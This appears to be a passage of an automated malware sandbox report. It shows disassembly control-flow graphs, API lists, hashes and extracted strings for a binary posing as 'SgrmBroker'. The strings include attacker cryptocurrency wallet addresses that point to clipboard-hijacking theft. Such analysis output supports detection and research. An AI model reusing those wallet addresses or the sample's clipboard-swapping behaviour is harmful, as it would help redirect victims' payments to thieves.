7ff6d9cfd670-7ff6d9cfd687 HeapFree 2664->2673 2670 7ff6d9cfd495-7ff6d9cfd49f 2665->2670 2671 7ff6d9cfd4c4-7ff6d9cfd4c7 2665->2671 2667 7ff6d9cfd540-7ff6d9cfd546 2666->2667 2668 7ff6d9cfd478-7ff6d9cfd47e 2666->2668 2682 7ff6d9cfd54c-7ff6d9cfd56d HeapFree 2667->2682 2683 
7ff6d9cfd657-7ff6d9cfd664 call 7ff6d9d00ff0 2667->2683 2676 7ff6d9cfd56f-7ff6d9cfd572 2668->2676 2678 7ff6d9cfd4a1-7ff6d9cfd4a8 2670->2678 2679 7ff6d9cfd4c9-7ff6d9cfd4d0 2670->2679 2680 7ff6d9cfd51e-7ff6d9cfd52e 2671->2680 2672->2662 2672->2672 2673->2673 2673->2675 2681 7ff6d9cfd3d0-7ff6d9cfd40c 2674->2681 2675->2650 2684 7ff6d9cfd610-7ff6d9cfd615 2676->2684 2685 7ff6d9cfd578-7ff6d9cfd586 2676->2685 2717 7ff6d9d00f3e-7ff6d9d00f96 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription call 7ff6d9dc9960 2677->2717 2718 7ff6d9cfd817-7ff6d9cfd842 call 7ff6d9d29420 2677->2718 2688 7ff6d9cfd4b0-7ff6d9cfd4ba 2678->2688 2679->2680 2689 7ff6d9cfd4d2 2679->2689 2680->2668 2690 7ff6d9cfd534 2680->2690 2681->2657 2681->2681 2682->2667 2682->2676 2683->2664 2696 7ff6d9cfd618-7ff6d9cfd62c 2684->2696 2691 7ff6d9cfd5fe-7ff6d9cfd601 2685->2691 2692 7ff6d9cfd588-7ff6d9cfd58f 2685->2692 2688->2688 2695 7ff6d9cfd4bc-7ff6d9cfd4c0 2688->2695 2697 7ff6d9cfd4e0-7ff6d9cfd51c 2689->2697 2690->2667 2691->2696 2698 7ff6d9cfd5b5-7ff6d9cfd5bd 2692->2698 2699 7ff6d9cfd591-7ff6d9cfd594 2692->2699 2695->2697 2701 7ff6d9cfd4c2 2695->2701 2702 7ff6d9cfd62e-7ff6d9cfd636 2696->2702 2703 7ff6d9cfd639-7ff6d9cfd63e 2696->2703 2697->2680 2697->2697 2698->2691 2705 7ff6d9cfd5bf 2698->2705 2704 7ff6d9cfd5a0-7ff6d9cfd5aa 2699->2704 2701->2680 2702->2703 2707 7ff6d9cfd644-7ff6d9cfd649 2703->2707 2708 7ff6d9cfd458-7ff6d9cfd460 2703->2708 2704->2704 2711 7ff6d9cfd5ac-7ff6d9cfd5b2 2704->2711 2712 7ff6d9cfd5c0-7ff6d9cfd5fc 2705->2712 2709 7ff6d9cfd440-7ff6d9cfd443 2707->2709 2710 7ff6d9cfd64f-7ff6d9cfd652 2707->2710 2708->2657 2708->2658 2715 7ff6d9cfd447-7ff6d9cfd455 HeapFree 2709->2715 2710->2715 2711->2698 2712->2691 2712->2712 2715->2708 2723 7ff6d9d00f9a-7ff6d9d00fbb 2717->2723 2724 7ff6d9d00f98 2717->2724 2718->2717 2725 7ff6d9cfd848-7ff6d9cfd87c WideCharToMultiByte 2718->2725 2726 7ff6d9d00fc0-7ff6d9d00fc4 2723->2726 2724->2723 2727 7ff6d9cfd880-7ff6d9cfd885 2725->2727 
2726->2724 2728 7ff6d9d00fc6-7ff6d9d00fd3 2726->2728 2729 7ff6d9cfd892-7ff6d9cfd8cb GlobalUnlock GetCurrentThread ImpersonateAnonymousToken CloseClipboard 2727->2729 2730 7ff6d9cfd887-7ff6d9cfd88d 2727->2730 2728->2726 2733 7ff6d9d00fd5-7ff6d9d00ff7 call 7ff6d9db9a40 call 7ff6d9cfbf40 2728->2733 2734 7ff6d9cfd8d3-7ff6d9cfd8de 2729->2734 2735 7ff6d9cfd8cd RevertToSelf 2729->2735 2730->2727 2731 7ff6d9cfd88f 2730->2731 2731->2729 2749 7ff6d9d00ffd-7ff6d9d01006 HeapFree 2733->2749 2750 7ff6d9d00ff9 2733->2750 2737 7ff6d9cfd8f2-7ff6d9cfd8f5 2734->2737 2738 7ff6d9cfd8e0-7ff6d9cfd8ec HeapFree 2734->2738 2735->2734 2740 7ff6d9cfd912-7ff6d9cfd915 2737->2740 2741 7ff6d9cfd8f7-7ff6d9cfd90c call 7ff6d9dd4ee0 2737->2741 2738->2737 2740->2717 2745 7ff6d9cfd91b-7ff6d9cfd935 call 7ff6d9dc9960 2740->2745 2741->2740 2751 7ff6d9cfda1a 2741->2751 2745->2717 2757 7ff6d9cfd93b-7ff6d9cfdaf9 call 7ff6d9dd4fe0 2745->2757 2750->2749 2753 7ff6d9cfda1f-7ff6d9cfda34 CreateWaitableTimerExW 2751->2753 2755 7ff6d9cfda3a-7ff6d9cfdaa9 SetWaitableTimer WaitForSingleObject CloseHandle 2753->2755 2756 7ff6d9cfd769-7ff6d9cfd77a Sleep 2753->2756 2755->2677 2760 7ff6d9cfdaaf 2755->2760 2756->2677 2763 7ff6d9cfdb12-7ff6d9cfdb28 2757->2763 2764 7ff6d9cfdafb-7ff6d9cfdb0c HeapFree 2757->2764 2760->2756 2763->2753 2764->2763
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 1910495013-0
                                                                                      • Opcode ID: 681293f55c76c5ee27876b0540fda4049ae221a60d5d32763f68924ca7a6df02
                                                                                      • Instruction ID: 180d7f4776e07be71eb9eb8366028009c4d4ff70d26e3c7cae33fa7dd54811a6
                                                                                      • Opcode Fuzzy Hash: 681293f55c76c5ee27876b0540fda4049ae221a60d5d32763f68924ca7a6df02
                                                                                      • Instruction Fuzzy Hash: 07C16021A09B8182E6A49F12A8443BE67B1FF89BD4F044237DE9E977D5DF3CE4658700

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$CloseCounterHandleRemove
                                                                                      • String ID:
                                                                                      • API String ID: 1366079419-0
                                                                                      • Opcode ID: 154a2e87eaab93ee58e853b70127dc7c9e1edf396652835a1a7629be190e324b
                                                                                      • Instruction ID: c8e39951a274d193bce0d14139653e117b3bd4fb9e7027dede31e7e998e0f2e4
                                                                                      • Opcode Fuzzy Hash: 154a2e87eaab93ee58e853b70127dc7c9e1edf396652835a1a7629be190e324b
                                                                                      • Instruction Fuzzy Hash: CEE19422B0AA4281EB559F2AA44837D67B1BF88BE8F454137CE5D977D4DF3CE4658300
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateArrayDestroyErrorFreeInfoPrngProcessSafe
                                                                                      • String ID:
                                                                                      • API String ID: 2479993482-0
                                                                                      • Opcode ID: 7d71b51fcbd30d1e8c50c97454091c2645adfb4ad59fa8785b6ec23a2b35a9de
                                                                                      • Instruction ID: d7c4b1d6a677af21823bb8e089750bb313615eb0768d28a9735d772ace85ee18
                                                                                      • Opcode Fuzzy Hash: 7d71b51fcbd30d1e8c50c97454091c2645adfb4ad59fa8785b6ec23a2b35a9de
                                                                                      • Instruction Fuzzy Hash: C6825B32A19BC181E7718F15E4403AEB7B0FB98B98F448126DA8D93B98DF7CD565CB00

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Heap$String$PrngProcess
                                                                                      • String ID: displayN$displayN$displayN$displayName$playName
                                                                                      • API String ID: 4214144531-1313144357
                                                                                      • Opcode ID: 2b342e5f85685317ce02a23e819d8e80e0b7b38f641c62df627f9f30b7e79569
                                                                                      • Instruction ID: 40e60f3e7ae5ff9e4e65e336a6e121de48e2898d6246936b5d30d3ea18fe73c8
                                                                                      • Opcode Fuzzy Hash: 2b342e5f85685317ce02a23e819d8e80e0b7b38f641c62df627f9f30b7e79569
                                                                                      • Instruction Fuzzy Hash: 9682F436609BC585EA618F15E4403EEB7B4FB99784F408226DACD83B59EF7CD1A4CB40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ROOT\CIMV2$WQLEmptyNullStringI1I2I4I8R4R8BoolUI1UI2UI4UI8ArrayObjectIUnknownWrapperinner$c
                                                                                      • API String ID: 0-3019736420
                                                                                      • Opcode ID: 99531c3c7453a8e4d84afae31c3e5beb014a172f2344b6765ea1f23d0f19871b
                                                                                      • Instruction ID: bf52744311e311aad9a600dd4bbabd9e02cf7ca034801ff7797e162f2940fd86
                                                                                      • Opcode Fuzzy Hash: 99531c3c7453a8e4d84afae31c3e5beb014a172f2344b6765ea1f23d0f19871b
                                                                                      • Instruction Fuzzy Hash: AE523632609B8185EA618F16E4403AEB7A4FB98B84F048136DECD87BA9DF7CD561C740

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorInfo$FreeString$BlanketCreateInstanceProxy
                                                                                      • String ID:
                                                                                      • API String ID: 2152923335-0
                                                                                      • Opcode ID: cefaa8679dd2d47a1e7ea3fdb189a3170873cfb4e18a35ab71da528795d5223e
                                                                                      • Instruction ID: e7a0141d733b470fb9732790d298aaf597dbf939229a143ccd3bb7b8076a98c8
                                                                                      • Opcode Fuzzy Hash: cefaa8679dd2d47a1e7ea3fdb189a3170873cfb4e18a35ab71da528795d5223e
                                                                                      • Instruction Fuzzy Hash: F9516C32608B8182EB549F65E59473EB7A0FF88B94F048136DE8A87B54DFBDD0548B40

                                                                                      Control-flow Graph
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: arenegyl$modnarod$setybdet$uespemos
                                                                                      • API String ID: 0-66988881
                                                                                      • Opcode ID: a9c401846955f20bb67985c4b005eb24b45b8f4170ddd1b87e594bc8d3f53a66
                                                                                      • Instruction ID: 47ae5da46ee8049b0b1b8f3055f70fbc62664493d97da9141f6571c61980a22c
                                                                                      • Opcode Fuzzy Hash: a9c401846955f20bb67985c4b005eb24b45b8f4170ddd1b87e594bc8d3f53a66
                                                                                      • Instruction Fuzzy Hash: 9A2232A2B29F8582EA148F6DA40057D6761FB89BE4F409336DEAE973D5EF3CC1518300

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeapInformationProcessQuery$ErrorInfo
                                                                                      • String ID:
                                                                                      • API String ID: 2435025923-0
                                                                                      • Opcode ID: 6acfa91e5c25f6d6f1330cd990612bbe57679b0e96ca0712aaea64567012cfd3
                                                                                      • Instruction ID: ce80b635d98a17c93812c5f5f77e5f6f790ab5f22956a141deb0b09b1dd9f71f
                                                                                      • Opcode Fuzzy Hash: 6acfa91e5c25f6d6f1330cd990612bbe57679b0e96ca0712aaea64567012cfd3
                                                                                      • Instruction Fuzzy Hash: D331A162B08F0191FB649F26E45037E66A1EF8CB94F544232DE8EC7BA4DE3CD5618300

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3903 7ff6d9cf7e40-7ff6d9cf7ef7 call 7ff6d9cf79f0 call 7ff6d9cf6c00 call 7ff6d9dc9960 3910 7ff6d9cf8a8c-7ff6d9cf8a8f 3903->3910 3911 7ff6d9cf7efd-7ff6d9cf7fb4 call 7ff6d9cf79f0 call 7ff6d9cf6620 call 7ff6d9dc9960 3903->3911 3913 7ff6d9cf8a90-7ff6d9cf8ac7 call 7ff6d9dd0e00 3910->3913 3911->3910 3925 7ff6d9cf7fba-7ff6d9cf806c call 7ff6d9cf79f0 call 7ff6d9cf6d50 call 7ff6d9dc9960 3911->3925 3916 7ff6d9cf8acc-7ff6d9cfb683 HeapFree call 7ff6d9cf66a0 call 7ff6d9dbf4b0 3913->3916 3932 7ff6d9cfb7db-7ff6d9cfb8de call 7ff6d9cf62c0 call 7ff6d9dbf4b0 3916->3932 3933 7ff6d9cfb697-7ff6d9cfb69f 3916->3933 3925->3910 3947 7ff6d9cf8072-7ff6d9cf80fe call 7ff6d9cf79f0 call 7ff6d9cf6a80 call 7ff6d9dc9960 3925->3947 3932->3933 3958 7ff6d9cfb8e4-7ff6d9cfb9c1 call 7ff6d9cf6290 call 7ff6d9dbf4b0 3932->3958 3935 7ff6d9cfb6a5-7ff6d9cfb6ad 3933->3935 3936 7ff6d9cfb9c7-7ff6d9cfbaca call 7ff6d9cf6a20 call 7ff6d9dbf4b0 3933->3936 3940 7ff6d9cfb6b3-7ff6d9cfb6bc 3935->3940 3941 7ff6d9cfbad0-7ff6d9cfbbf8 call 7ff6d9cf7120 call 7ff6d9dbf4b0 3935->3941 3936->3940 3936->3941 3945 7ff6d9cfb6c2-7ff6d9cfb6c7 3940->3945 3946 7ff6d9cfbbfe-7ff6d9cfbd10 call 7ff6d9cf6460 call 7ff6d9dbf4b0 3940->3946 3941->3945 3941->3946 3952 7ff6d9cfb6cd-7ff6d9cfb6d5 3945->3952 3953 7ff6d9cfbd16-7ff6d9cfbe10 call 7ff6d9cf6670 call 7ff6d9dbf4b0 3945->3953 3946->3952 3946->3953 3947->3910 3991 7ff6d9cf8104-7ff6d9cf81b6 call 7ff6d9cf79f0 call 7ff6d9cf6370 call 7ff6d9dc9960 3947->3991 3960 7ff6d9cfb6db-7ff6d9cfb6de 3952->3960 3961 7ff6d9cfbe16-7ff6d9cfbf26 call 7ff6d9cf6fa0 call 7ff6d9dbf4b0 3952->3961 3953->3960 3953->3961 3958->3935 3958->3936 3968 7ff6d9cfb6e4-7ff6d9cfb7d6 call 7ff6d9cf6640 call 7ff6d9dbf4b0 call 7ff6d9dc98f0 3960->3968 3969 7ff6d9cfbf2c-7ff6d9cfbf31 call 7ff6d9dc98f0 3960->3969 3961->3968 3961->3969 3968->3932 3991->3910 3999 7ff6d9cf81bc-7ff6d9cf8248 call 7ff6d9cf79f0 call 7ff6d9cf67f0 call 7ff6d9dc9960 
3991->3999 3999->3910 4006 7ff6d9cf824e-7ff6d9cf8305 call 7ff6d9cf79f0 call 7ff6d9cf60c0 call 7ff6d9dc9960 3999->4006 4006->3910 4013 7ff6d9cf830b-7ff6d9cf83c2 call 7ff6d9cf79f0 call 7ff6d9cf6240 call 7ff6d9dc9960 4006->4013 4013->3910 4020 7ff6d9cf83c8-7ff6d9cf847f call 7ff6d9cf79f0 call 7ff6d9cf6e70 call 7ff6d9dc9960 4013->4020 4020->3910 4027 7ff6d9cf8485-7ff6d9cf853c call 7ff6d9cf79f0 call 7ff6d9cf6850 call 7ff6d9dc9960 4020->4027 4027->3910 4034 7ff6d9cf8542-7ff6d9cf85f9 call 7ff6d9cf79f0 call 7ff6d9cf6b70 call 7ff6d9dc9960 4027->4034 4034->3910 4041 7ff6d9cf85ff-7ff6d9cf86b1 call 7ff6d9cf79f0 call 7ff6d9cf67c0 call 7ff6d9dc9960 4034->4041 4041->3910 4048 7ff6d9cf86b7-7ff6d9cf8743 call 7ff6d9cf79f0 call 7ff6d9cf68e0 call 7ff6d9dc9960 4041->4048 4048->3910 4055 7ff6d9cf8749-7ff6d9cf8800 call 7ff6d9cf79f0 call 7ff6d9cf6730 call 7ff6d9dc9960 4048->4055 4055->3910 4062 7ff6d9cf8806-7ff6d9cf88bd call 7ff6d9cf79f0 call 7ff6d9cf6950 call 7ff6d9dc9960 4055->4062 4062->3910 4069 7ff6d9cf88c3-7ff6d9cf8956 call 7ff6d9cf79f0 4062->4069 4072 7ff6d9cf895c-7ff6d9cf8963 4069->4072 4073 7ff6d9cf8a3b-7ff6d9cf8a8b 4069->4073 4072->4073 4074 7ff6d9cf8969-7ff6d9cf8970 4072->4074 4075 7ff6d9cf8a08-7ff6d9cf8a23 4074->4075 4076 7ff6d9cf8976-7ff6d9cf8990 4074->4076 4075->4073 4078 7ff6d9cf8a25-7ff6d9cf8a35 HeapFree 4075->4078 4077 7ff6d9cf89ac-7ff6d9cf89af 4076->4077 4079 7ff6d9cf89b1-7ff6d9cf89bf 4077->4079 4080 7ff6d9cf89df-7ff6d9cf89f0 4077->4080 4078->4073 4081 7ff6d9cf89c0-7ff6d9cf89db 4079->4081 4082 7ff6d9cf89f2-7ff6d9cf8a06 HeapFree 4080->4082 4083 7ff6d9cf89a0-7ff6d9cf89aa 4080->4083 4081->4081 4084 7ff6d9cf89dd 4081->4084 4082->4083 4083->4075 4083->4077 4084->4080
                                                                                      APIs
                                                                                      Strings
                                                                                      • bnb1wgg754yum45k3xdujqux70grjamchd0r835qx30xbfc5eC42b076474556956170b0FEE67c44085A02bc1qra7aw9jlr4xvlh70aak2fgu9jfnjjal684ak8nDU53q9RcY38fQR6ucJ8UfRQezP5HWb1YorLNk3xaBohZWogkoVGW5W7c9ZrPVgrHpoJmXs9vVEZJjqf2u9jpyrYqwEJ5eqVKyYJWQSrNGLYRou7kXMBJydjJREVNgiskxGCM17, xrefs: 00007FF6D9CF7E8A
                                                                                      • addr1qx0uvzkwcadg2fxtsjmf2gycwmm9euk07tp6xrucnvgjmp5lcc9va366s5jvhp9kj5sfsahktnevlukr5v8e3xc39krqkkzrmkUQA8QuqPYcdTBkQ31TFvM8XajaQc3R_C-5JFD_hrWlPm4hD1AWDLScUnSMFytQa25skvZetXDLWCH7N6Ef0xfFB8E61AF3e168EDF84BB3C020d43bCEb5A23D33t1bJ6AkfYVwT39PyvKLw6erNqqgxg6Yub, xrefs: 00007FF6D9CF8355
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Free$Process
                                                                                      • String ID: addr1qx0uvzkwcadg2fxtsjmf2gycwmm9euk07tp6xrucnvgjmp5lcc9va366s5jvhp9kj5sfsahktnevlukr5v8e3xc39krqkkzrmkUQA8QuqPYcdTBkQ31TFvM8XajaQc3R_C-5JFD_hrWlPm4hD1AWDLScUnSMFytQa25skvZetXDLWCH7N6Ef0xfFB8E61AF3e168EDF84BB3C020d43bCEb5A23D33t1bJ6AkfYVwT39PyvKLw6erNqqgxg6Yub$bnb1wgg754yum45k3xdujqux70grjamchd0r835qx30xbfc5eC42b076474556956170b0FEE67c44085A02bc1qra7aw9jlr4xvlh70aak2fgu9jfnjjal684ak8nDU53q9RcY38fQR6ucJ8UfRQezP5HWb1YorLNk3xaBohZWogkoVGW5W7c9ZrPVgrHpoJmXs9vVEZJjqf2u9jpyrYqwEJ5eqVKyYJWQSrNGLYRou7kXMBJydjJREVNgiskxGCM17
                                                                                      • API String ID: 2719409998-3231638534
                                                                                      • Opcode ID: 2590335adbe2db1ce14068069ad4a343ce949a76aa3686c4218140aa74e4d27e
                                                                                      • Instruction ID: 9e6a701b008196aa38edbe3aef54c89f217ef75b5b80aad09e66bb7ae3ba446a
                                                                                      • Opcode Fuzzy Hash: 2590335adbe2db1ce14068069ad4a343ce949a76aa3686c4218140aa74e4d27e
                                                                                      • Instruction Fuzzy Hash: FF72C432609B5181E7649F15E4903AE7BB5EBC83A4F444236EACD83BA9DF3CC255CB50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4085 7ff6d9dd08f0-7ff6d9dd0903 4086 7ff6d9dd0905-7ff6d9dd0913 4085->4086 4087 7ff6d9dd0920-7ff6d9dd0922 4085->4087 4088 7ff6d9dd0915-7ff6d9dd091b 4086->4088 4089 7ff6d9dd0927-7ff6d9dd0936 4086->4089 4090 7ff6d9dd0b9f-7ff6d9dd0bb2 4087->4090 4091 7ff6d9dd09b0-7ff6d9dd09ec 4088->4091 4092 7ff6d9dd096e-7ff6d9dd097c 4089->4092 4093 7ff6d9dd0938-7ff6d9dd0947 4089->4093 4094 7ff6d9dd09f2-7ff6d9dd0a07 call 7ff6d9dc9960 4091->4094 4095 7ff6d9dd0bc5-7ff6d9dd0bc7 4091->4095 4092->4091 4096 7ff6d9dd097e-7ff6d9dd098f 4093->4096 4097 7ff6d9dd0949-7ff6d9dd0967 4093->4097 4094->4095 4102 7ff6d9dd0a0d-7ff6d9dd0a2d 4094->4102 4099 7ff6d9dd0991-7ff6d9dd09ae 4096->4099 4100 7ff6d9dd0969-7ff6d9dd096c 4096->4100 4097->4099 4097->4100 4099->4091 4100->4091 4103 7ff6d9dd0a40-7ff6d9dd0a44 4102->4103 4104 7ff6d9dd0ad0-7ff6d9dd0ad7 4103->4104 4105 7ff6d9dd0a4a-7ff6d9dd0a4d 4103->4105 4106 7ff6d9dd0a30-7ff6d9dd0a3d 4104->4106 4107 7ff6d9dd0add-7ff6d9dd0b05 call 7ff6d9de8850 4104->4107 4108 7ff6d9dd0a53-7ff6d9dd0a5a 4105->4108 4109 7ff6d9dd0b50-7ff6d9dd0b5d 4105->4109 4106->4103 4107->4106 4113 7ff6d9dd0a6a-7ff6d9dd0a7d 4108->4113 4114 7ff6d9dd0a5c-7ff6d9dd0a66 4108->4114 4111 7ff6d9dd0bb3-7ff6d9dd0bb8 4109->4111 4112 7ff6d9dd0b5f-7ff6d9dd0b66 4109->4112 4120 7ff6d9dd0bba 4111->4120 4121 7ff6d9dd0b8d-7ff6d9dd0b99 HeapFree 4111->4121 4112->4095 4116 7ff6d9dd0b68-7ff6d9dd0b76 SysAllocStringLen 4112->4116 4118 7ff6d9dd0a7f-7ff6d9dd0a91 4113->4118 4119 7ff6d9dd0aba-7ff6d9dd0ac7 4113->4119 4114->4106 4117 7ff6d9dd0a68 4114->4117 4116->4095 4122 7ff6d9dd0b78-7ff6d9dd0b86 SysStringLen 4116->4122 4117->4107 4123 7ff6d9dd0a93-7ff6d9dd0ab6 4118->4123 4124 7ff6d9dd0b0a-7ff6d9dd0b1d 4118->4124 4119->4104 4120->4090 4121->4090 4126 7ff6d9dd0bbc-7ff6d9dd0bbf SysFreeString 4122->4126 4127 7ff6d9dd0b88-7ff6d9dd0b8b 4122->4127 4123->4104 4128 7ff6d9dd0ab8 4123->4128 4124->4104 4125 
